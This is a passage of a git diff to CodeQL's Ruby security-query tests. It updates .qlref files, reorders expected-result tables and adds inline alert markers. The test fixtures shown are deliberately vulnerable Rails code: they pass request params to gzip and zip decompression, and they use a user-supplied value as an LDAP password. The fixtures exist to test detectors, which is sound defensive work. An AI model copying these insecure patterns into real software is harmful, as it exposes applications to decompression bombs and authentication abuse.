.../IncompleteHostnameRegExp.qlref | 3 +- .../IncompleteHostnameRegExp/hosttest.rb | 6 +- .../tst-IncompleteHostnameRegExp.rb | 48 ++--- .../IncompleteUrlSubstringSanitization.qlref | 3 +- .../tst-IncompleteUrlSubstringSanitization.rb | 50 ++--- .../MissingFullAnchor.expected | 8 +- .../MissingFullAnchor/MissingFullAnchor.qlref | 3 +- .../MissingFullAnchor/impl/miss-anchor.rb | 12 +- .../MissingRegExpAnchor.qlref | 3 +- .../missing_regexp_anchor.rb | 38 ++-- .../OverlyLargeRangeQuery.qlref | 3 +- .../suspicous_regexp_range.rb | 22 +-- .../cwe-078/KernelOpen/KernelOpen.expected | 22 +-- .../cwe-078/KernelOpen/KernelOpen.qlref | 3 +- .../security/cwe-078/KernelOpen/KernelOpen.rb | 22 +-- .../NonConstantKernelOpen.qlref | 3 +- .../NonConstantKernelOpen.rb | 22 +-- .../UnsafeShellCommandConstruction.expected | 32 ++-- .../UnsafeShellCommandConstruction.qlref | 3 +- .../impl/sub/notImported.rb | 4 +- .../impl/sub/other.rb | 4 +- .../impl/sub/other2.rb | 4 +- .../impl/unsafeShell.rb | 44 ++--- .../security/cwe-079/ReflectedXSS.qlref | 2 +- .../security/cwe-079/StoredXSS.qlref | 2 +- .../cwe-079/UnsafeHtmlConstruction.expected | 10 +- .../cwe-079/UnsafeHtmlConstruction.qlref | 3 +- .../security/cwe-079/lib/unsafeHtml.rb | 16 +- .../security/cwe-089/ActiveRecordInjection.rb | 86 ++++----- .../security/cwe-089/ArelInjection.rb | 6 +- .../security/cwe-089/PgInjection.rb | 14 +- .../security/cwe-089/SqlInjection.expected | 98 +++++----- .../security/cwe-089/SqlInjection.qlref | 3 +- .../UnsafeCodeConstruction.expected | 24 +-- .../UnsafeCodeConstruction.qlref | 3 +- .../UnsafeCodeConstruction/impl/unsafeCode.rb | 40 ++-- .../cwe-116/BadTagFilter/BadTagFilter.qlref | 3 +- .../security/cwe-116/BadTagFilter/test.rb | 28 +-- .../IncompleteSanitization.qlref | 3 +- .../cwe-116/IncompleteSanitization/tst.rb | 100 +++++----- .../security/cwe-117/LogInjection.expected | 16 +- .../security/cwe-117/LogInjection.qlref | 3 +- .../app/controllers/users_controller.rb | 18 +- .../cwe-1333-exponential-redos/ReDoS.qlref | 3 +- .../cwe-1333-exponential-redos/tst.rb | 174 +++++++++--------- .../PolynomialReDoS.expected | 58 +++--- .../PolynomialReDoS.qlref | 3 +- .../PolynomialReDoS.rb | 66 +++---- .../cwe-1333-polynomial-redos/lib/index.rb | 10 +- .../RegExpInjection.expected | 12 +- .../RegExpInjection.qlref | 3 +- .../RegExpInjection.rb | 20 +- .../cwe-134/TaintedFormatString.expected | 28 +-- .../cwe-134/TaintedFormatString.qlref | 3 +- .../security/cwe-134/tainted_format_string.rb | 26 +-- .../cwe-209/StackTraceExposure.expected | 8 +- .../security/cwe-209/StackTraceExposure.qlref | 3 +- .../security/cwe-209/StackTraceExposure.rb | 8 +- .../query-tests/security/cwe-295/Excon.rb | 10 +- .../query-tests/security/cwe-295/Faraday.rb | 8 +- .../security/cwe-295/HttpClient.rb | 2 +- .../query-tests/security/cwe-295/Httparty.rb | 10 +- .../query-tests/security/cwe-295/NetHttp.rb | 2 +- .../query-tests/security/cwe-295/OpenURI.rb | 12 +- .../cwe-295/RequestWithoutValidation.qlref | 3 +- .../security/cwe-295/RestClient.rb | 8 +- .../query-tests/security/cwe-295/Typhoeus.rb | 4 +- .../cwe-312/CleartextLogging.expected | 46 ++--- .../security/cwe-312/CleartextLogging.qlref | 3 +- .../cwe-312/CleartextStorage.expected | 58 +++--- .../security/cwe-312/CleartextStorage.qlref | 3 +- .../app/controllers/users_controller.rb | 46 ++--- .../security/cwe-312/app/models/user.rb | 12 +- .../query-tests/security/cwe-312/logging.rb | 58 +++--- .../cwe-327/BrokenCryptoAlgorithm.qlref | 3 +- .../cwe-327/WeakSensitiveDataHashing.expected | 16 +- .../cwe-327/WeakSensitiveDataHashing.qlref | 3 +- .../security/cwe-327/broken_crypto.rb | 36 ++-- .../security/cwe-327/weak_hashing.rb | 20 +- .../cwe-352/CSRFProtectionDisabled.qlref | 3 +- .../cwe-352/CSRFProtectionNotEnabled.qlref | 3 +- .../alternative_root_controller.rb | 2 +- .../app/controllers/application_controller.rb | 2 +- .../app/controllers/users_controller.rb | 2 +- .../cwe-352/railsapp/config/application.rb | 2 +- .../config/environments/development.rb | 2 +- .../config/environments/production.rb | 2 +- .../oj-global-options/OjGlobalOptions.rb | 4 +- .../UnsafeDeserialization.expected | 4 +- .../UnsafeDeserialization.qlref | 3 +- .../ox-global-options/OxGlobalOptions.rb | 4 +- .../UnsafeDeserialization.expected | 4 +- .../UnsafeDeserialization.qlref | 3 +- .../UnsafeDeserialization.expected | 56 +++--- .../UnsafeDeserialization.qlref | 3 +- .../UnsafeDeserialization.rb | 84 ++++----- .../HardcodedDataInterpretedAsCode.expected | 8 +- .../HardcodedDataInterpretedAsCode.qlref | 3 +- .../test/query-tests/security/cwe-506/tst.rb | 10 +- .../security/cwe-598/SensitiveGetQuery.qlref | 3 +- .../app/controllers/users_controller.rb | 6 +- .../security/cwe-601/UrlRedirect.expected | 22 +-- .../security/cwe-601/UrlRedirect.qlref | 3 +- .../security/cwe-601/UrlRedirect.rb | 20 +- .../cwe-611/libxml-backend/LibXmlBackend.rb | 10 +- .../cwe-611/libxml-backend/Xxe.expected | 10 +- .../security/cwe-611/libxml-backend/Xxe.qlref | 3 +- .../security/cwe-611/xxe/LibXmlRuby.rb | 18 +- .../security/cwe-611/xxe/Nokogiri.rb | 32 ++-- .../security/cwe-611/xxe/Xxe.expected | 48 ++--- .../security/cwe-611/xxe/Xxe.qlref | 3 +- .../security/cwe-732/FilePermissions.rb | 26 +-- .../cwe-732/WeakCookieConfiguration.qlref | 3 +- .../cwe-732/WeakFilePermissions.expected | 24 +-- .../cwe-732/WeakFilePermissions.qlref | 3 +- .../cwe-732/app/config/application.rb | 10 +- .../cwe-798/HardcodedCredentials.expected | 24 +-- .../cwe-798/HardcodedCredentials.qlref | 3 +- .../security/cwe-798/HardcodedCredentials.rb | 22 +-- .../ConditionalBypass.expected | 8 +- .../ConditionalBypass.qlref | 3 +- .../ConditionalBypass.rb | 10 +- .../cwe-912/HttpToFileAccess.expected | 6 +- .../security/cwe-912/HttpToFileAccess.qlref | 3 +- .../security/cwe-912/http_to_file_access.rb | 8 +- .../security/cwe-915/MassAssignment.expected | 44 ++--- .../security/cwe-915/MassAssignment.qlref | 3 +- .../test/query-tests/security/cwe-915/test.rb | 46 ++--- .../cwe-918/ServerSideRequestForgery.expected | 8 +- .../cwe-918/ServerSideRequestForgery.qlref | 3 +- .../cwe-918/ServerSideRequestForgery.rb | 8 +- .../DecompressionApi.expected | 6 +- .../decompression-api/DecompressionApi.qlref | 3 +- .../decompression-api/decompression_api.rb | 6 +- .../query-tests/summary/LinesOfCode.qlref | 2 +- .../query-tests/summary/LinesOfUserCode.qlref | 2 +- .../FrameworkModeAccessPaths.qlref | 2 +- .../modeleditor/FrameworkModeEndpoints.qlref | 2 +- .../utils/modeleditor/GenerateModel.qlref | 2 +- 191 files changed, 1401 insertions(+), 1346 deletions(-) diff --git a/ruby/ql/test/library-tests/dataflow/params/TypeTracker.qlref b/ruby/ql/test/library-tests/dataflow/params/TypeTracker.qlref index 2815162f7d8f..d3ee4a6ea04a 100644 --- a/ruby/ql/test/library-tests/dataflow/params/TypeTracker.qlref +++ b/ruby/ql/test/library-tests/dataflow/params/TypeTracker.qlref @@ -1 +1 @@ -library-tests/dataflow/type-tracker/TypeTracker.ql \ No newline at end of file +query: library-tests/dataflow/type-tracker/TypeTracker.ql diff --git a/ruby/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref b/ruby/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref index 9d7833eccae7..dc898fca718c 100644 --- a/ruby/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref +++ b/ruby/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref @@ -1 +1 @@ -AlertSuppression.ql +query: AlertSuppression.ql diff --git a/ruby/ql/test/query-tests/analysis/Definitions.qlref b/ruby/ql/test/query-tests/analysis/Definitions.qlref index a8620aaeec6b..5d25fcc33076 100644 --- a/ruby/ql/test/query-tests/analysis/Definitions.qlref +++ b/ruby/ql/test/query-tests/analysis/Definitions.qlref @@ -1 +1 @@ -queries/analysis/Definitions.ql +query: queries/analysis/Definitions.ql diff --git a/ruby/ql/test/query-tests/diagnostics/ExtractedFiles.qlref b/ruby/ql/test/query-tests/diagnostics/ExtractedFiles.qlref index d9d732152e22..ed3e1b70d3ec 100644 --- a/ruby/ql/test/query-tests/diagnostics/ExtractedFiles.qlref +++ b/ruby/ql/test/query-tests/diagnostics/ExtractedFiles.qlref @@ -1 +1 @@ -queries/diagnostics/ExtractedFiles.ql \ No newline at end of file +query: queries/diagnostics/ExtractedFiles.ql diff --git a/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.qlref b/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.qlref index ffbdb0a7b1b5..9169d655e25c 100644 --- a/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.qlref +++ b/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.qlref @@ -1 +1 @@ -queries/diagnostics/ExtractionErrors.ql \ No newline at end of file +query: queries/diagnostics/ExtractionErrors.ql diff --git a/ruby/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref b/ruby/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref index ff6e566d20a7..24af39e23262 100644 --- a/ruby/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref +++ b/ruby/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref @@ -1 +1 @@ -queries/diagnostics/ExtractionWarnings.ql +query: queries/diagnostics/ExtractionWarnings.ql diff --git a/ruby/ql/test/query-tests/diagnostics/NumberOfFilesExtractedWithErrors.qlref b/ruby/ql/test/query-tests/diagnostics/NumberOfFilesExtractedWithErrors.qlref index 17823cc88374..334f91d2d60a 100644 --- a/ruby/ql/test/query-tests/diagnostics/NumberOfFilesExtractedWithErrors.qlref +++ b/ruby/ql/test/query-tests/diagnostics/NumberOfFilesExtractedWithErrors.qlref @@ -1 +1 @@ -queries/summary/NumberOfFilesExtractedWithErrors.ql \ No newline at end of file +query: queries/summary/NumberOfFilesExtractedWithErrors.ql diff --git a/ruby/ql/test/query-tests/diagnostics/NumberOfSuccessfullyExtractedFiles.qlref b/ruby/ql/test/query-tests/diagnostics/NumberOfSuccessfullyExtractedFiles.qlref index 5f6eda05206f..35a0e05ddb1e 100644 --- a/ruby/ql/test/query-tests/diagnostics/NumberOfSuccessfullyExtractedFiles.qlref +++ b/ruby/ql/test/query-tests/diagnostics/NumberOfSuccessfullyExtractedFiles.qlref @@ -1 +1 @@ -queries/summary/NumberOfSuccessfullyExtractedFiles.ql \ No newline at end of file +query: queries/summary/NumberOfSuccessfullyExtractedFiles.ql diff --git a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected index e2f8d0cb2304..2631d47b89f4 100644 --- a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected +++ b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected @@ -1,3 +1,24 @@ +#select +| gzipBombs.rb:6:3:6:34 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:6:3:6:34 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:7:3:9:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:7:3:9:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:10:3:14:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:10:3:14:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:15:22:15:53 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:15:22:15:53 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:20:3:20:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:20:3:20:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:21:3:21:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:21:3:21:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:25:3:25:40 | call to zcat | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:25:3:25:40 | call to zcat | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| zipBombs.rb:6:3:11:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:6:3:11:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:12:3:14:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:12:3:14:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:15:11:15:45 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:15:11:15:45 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:17:3:17:42 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:17:3:17:42 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:18:3:18:51 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:18:3:18:51 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:28:7:28:33 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:28:7:28:33 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:34:5:34:17 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:34:5:34:17 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:35:5:35:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:35:5:35:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:41:7:41:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:41:7:41:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:42:7:42:19 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:42:7:42:19 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:46:10:46:36 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:46:10:46:36 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:51:8:51:34 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:51:8:51:34 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:55:5:55:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:55:5:55:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | edges | gzipBombs.rb:4:3:4:11 | gzip_path | gzipBombs.rb:6:25:6:33 | gzip_path | provenance | | | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:4:15:4:27 | ...[...] | provenance | | @@ -91,24 +112,3 @@ nodes | zipBombs.rb:53:29:53:40 | zipfile_path | semmle.label | zipfile_path | | zipBombs.rb:55:5:55:31 | call to read | semmle.label | call to read | subpaths -#select -| gzipBombs.rb:6:3:6:34 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:6:3:6:34 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:7:3:9:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:7:3:9:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:10:3:14:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:10:3:14:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:15:22:15:53 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:15:22:15:53 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:20:3:20:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:20:3:20:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:21:3:21:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:21:3:21:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:25:3:25:40 | call to zcat | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:25:3:25:40 | call to zcat | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| zipBombs.rb:6:3:11:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:6:3:11:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:12:3:14:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:12:3:14:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:15:11:15:45 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:15:11:15:45 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:17:3:17:42 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:17:3:17:42 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:18:3:18:51 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:18:3:18:51 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:28:7:28:33 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:28:7:28:33 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:34:5:34:17 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:34:5:34:17 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:35:5:35:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:35:5:35:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:41:7:41:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:41:7:41:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:42:7:42:19 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:42:7:42:19 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:46:10:46:36 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:46:10:46:36 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:51:8:51:34 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:51:8:51:34 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:55:5:55:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:55:5:55:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | diff --git a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.qlref b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.qlref index c24a4cc9678e..e65789fc0d9a 100644 --- a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.qlref +++ b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.qlref @@ -1 +1,2 @@ -experimental/CWE-522-DecompressionBombs/DecompressionBombs.ql \ No newline at end of file +query: experimental/CWE-522-DecompressionBombs/DecompressionBombs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/gzipBombs.rb b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/gzipBombs.rb index bf9bb7b329dc..1a7636809b13 100644 --- a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/gzipBombs.rb +++ b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/gzipBombs.rb @@ -1,27 +1,27 @@ require 'zlib' class TestController < ActionController::Base - gzip_path = params[:path] + gzip_path = params[:path] # $ Source - Zlib::GzipReader.open(gzip_path).read + Zlib::GzipReader.open(gzip_path).read # $ Alert Zlib::GzipReader.open(gzip_path) do |uncompressedfile| puts uncompressedfile.read - end + end # $ Alert Zlib::GzipReader.open(gzip_path) do |uncompressedfile| uncompressedfile.each do |entry| puts entry end - end - uncompressedfile = Zlib::GzipReader.open(gzip_path) + end # $ Alert + uncompressedfile = Zlib::GzipReader.open(gzip_path) # $ Alert uncompressedfile.each do |entry| puts entry end - Zlib::GzipReader.new(File.open(gzip_path, 'rb')).read - Zlib::GzipReader.new(File.open(gzip_path, 'rb')).each do |entry| + Zlib::GzipReader.new(File.open(gzip_path, 'rb')).read # $ Alert + Zlib::GzipReader.new(File.open(gzip_path, 'rb')).each do |entry| # $ Alert puts entry end - Zlib::GzipReader.zcat(open(gzip_path)) + Zlib::GzipReader.zcat(open(gzip_path)) # $ Alert end diff --git a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/zipBombs.rb b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/zipBombs.rb index 5aab5ce63827..9d0d047b0358 100644 --- a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/zipBombs.rb +++ b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/zipBombs.rb @@ -1,21 +1,21 @@ require 'zip' class TestController < ActionController::Base - zipfile_path = params[:path] + zipfile_path = params[:path] # $ Source Zip::InputStream.open(zipfile_path) do |input| while (entry = input.get_next_entry) puts :file_name, entry.name input end - end + end # $ Alert Zip::InputStream.open(zipfile_path) do |input| input.read - end - input = Zip::InputStream.open(zipfile_path) + end # $ Alert + input = Zip::InputStream.open(zipfile_path) # $ Alert - Zip::File.open(zipfile_path).read "10GB" - Zip::File.open(zipfile_path).extract "10GB", "./" + Zip::File.open(zipfile_path).read "10GB" # $ Alert + Zip::File.open(zipfile_path).extract "10GB", "./" # $ Alert Zip::File.open(zipfile_path) do |zip_file| # Handle entries one by one @@ -25,33 +25,33 @@ class TestController < ActionController::Base # Extract to file or directory based on name in the archive entry.extract # Read into memory - entry.get_input_stream.read + entry.get_input_stream.read # $ Alert end end zip_file = Zip::File.open(zipfile_path) zip_file.each do |entry| - entry.extract - entry.get_input_stream.read + entry.extract # $ Alert + entry.get_input_stream.read # $ Alert end # Find specific entry Zip::File.open(zipfile_path) do |zip_file| zip_file.glob('*.xml').each do |entry| - zip_file.read(entry.name) - entry.extract + zip_file.read(entry.name) # $ Alert + entry.extract # $ Alert end entry = zip_file.glob('*.csv').first raise 'File too large when extracted' if entry.size > MAX_SIZE - puts entry.get_input_stream.read + puts entry.get_input_stream.read # $ Alert end zip_file = Zip::File.open(zipfile_path) entry = zip_file.glob('*.csv') - puts entry.get_input_stream.read + puts entry.get_input_stream.read # $ Alert zip_file = Zip::File.open(zipfile_path) zip_file.glob('*') do |entry| - entry.get_input_stream.read + entry.get_input_stream.read # $ Alert end end diff --git a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected index 635cfcd4b3e7..da8f84eabfba 100644 --- a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected +++ b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected @@ -1,3 +1,6 @@ +#select +| ImproperLdapAuth.rb:15:23:15:26 | pass | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:15:23:15:26 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:5:12:5:17 | call to params | user-provided value | +| ImproperLdapAuth.rb:31:24:31:27 | pass | ImproperLdapAuth.rb:24:12:24:17 | call to params | ImproperLdapAuth.rb:31:24:31:27 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:24:12:24:17 | call to params | user-provided value | edges | ImproperLdapAuth.rb:5:5:5:8 | pass | ImproperLdapAuth.rb:15:23:15:26 | pass | provenance | | | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:5:12:5:24 | ...[...] | provenance | | @@ -15,6 +18,3 @@ nodes | ImproperLdapAuth.rb:24:12:24:24 | ...[...] | semmle.label | ...[...] | | ImproperLdapAuth.rb:31:24:31:27 | pass | semmle.label | pass | subpaths -#select -| ImproperLdapAuth.rb:15:23:15:26 | pass | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:15:23:15:26 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:5:12:5:17 | call to params | user-provided value | -| ImproperLdapAuth.rb:31:24:31:27 | pass | ImproperLdapAuth.rb:24:12:24:17 | call to params | ImproperLdapAuth.rb:31:24:31:27 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:24:12:24:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.qlref b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.qlref index 65f60a22b789..42e36ad38a87 100644 --- a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.qlref +++ b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.qlref @@ -1 +1,2 @@ -experimental/ldap-improper-auth/ImproperLdapAuth.ql \ No newline at end of file +query: experimental/ldap-improper-auth/ImproperLdapAuth.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.rb b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.rb index 2705158563e3..07dd430b9e4a 100644 --- a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.rb +++ b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def some_request_handler # A string tainted by user input is used directly as password # (i.e a remote flow source) - pass = params[:pass] + pass = params[:pass] # $ Source # BAD: user input is not sanitized ldap = Net::LDAP.new( @@ -12,7 +12,7 @@ def some_request_handler auth: { method: :simple, username: 'uid=admin,dc=example,dc=com', - password: pass + password: pass # $ Alert } ) ldap.bind @@ -21,14 +21,14 @@ def some_request_handler def some_request_handler # A string tainted by user input is used directly as password # (i.e a remote flow source) - pass = params[:pass] + pass = params[:pass] # $ Source # BAD: user input is not sanitized ldap = Net::LDAP.new ldap.host = your_server_ip_address ldap.encryption(:method => :simple_tls) ldap.port = 639 - ldap.auth "admin", pass + ldap.auth "admin", pass # $ Alert ldap.bind end end diff --git a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected index 581157b61235..36cb35dfaffb 100644 --- a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected +++ b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected @@ -1,6 +1,6 @@ +#select +| InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | This uses a cryptographically insecure random number generated at $@ in a security context. | InsecureRandomness.rb:6:42:6:57 | call to rand | call to rand | edges nodes | InsecureRandomness.rb:6:42:6:57 | call to rand | semmle.label | call to rand | subpaths -#select -| InsecureRandomness.rb:6:42:6:57 | call to rand | 